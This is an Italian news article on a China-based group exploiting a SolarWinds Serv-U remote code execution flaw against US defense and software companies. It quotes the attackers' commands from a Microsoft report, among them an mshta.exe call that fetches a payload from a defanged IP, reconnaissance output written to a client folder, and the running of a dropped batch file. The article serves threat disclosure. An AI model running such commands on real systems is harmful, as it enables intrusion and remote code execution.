Hacker cinesi stanno prendono di mira le società di difesa e software statunitensi utilizzando una vulnerabilità nel server FTP SolarWinds Serv-U.
“Il gruppo ha sede in Cina ed è utilizza VPN commerciali e router consumer compromessi nella propria infrastruttura di attacco”, conferma un nuovo post sul blog del Microsoft Threat Intelligence Center.
“Il settore DIB è il complesso industriale mondiale che consente ricerca e sviluppo (R&S), nonché progettazione, produzione, consegna e manutenzione di sistemi d’arma militari, sottosistemi e componenti o parti, per soddisfare i requisiti militari statunitensi”, spiega un Documento CISA descrittivo del settore DIB.
Di seguito sono elencati alcuni dei comandi eseguiti tramite la vulnerabilità legata all’esecuzione di codice in remoto.
C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged) cmd.exe /c whoami > “./Client/Common/redacted.txt” cmd.exe /c dir > “.\Client\Common\redacted.txt” cmd.exe /c “”C:\Windows\Temp\Serv-U.bat”” powershell.exe C:\Windows\Temp\Serv-U.bat cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”
Check Point raccomanda l'uso di password forti per proteggere gli utenti dalle minacce informatiche
Le carte trasporto servono a ridurre lo spreco di carta, velocizzare il transito dei passeggeri…
Kaspersky ha sviluppato una propria infrastruttura thin client basata su KasperskyOS per garantire una connessione…
Un semplice ritardo di 600 ms ha portato alla scoperta di una delle più pericolose…
Sono tante. Troppe. E ricordarle tutte e praticamente impossibile. Ecco perché sono nati i password…
Microsoft ha presentato Copilot for Security, un “robocop” per chi si occupa di sicurezza
Abbonati ad Hackerjournal per un anno a 33,90 € con digitale in omaggio anziché 46,90 €!
CLICCA QUI PER ABBONARTI!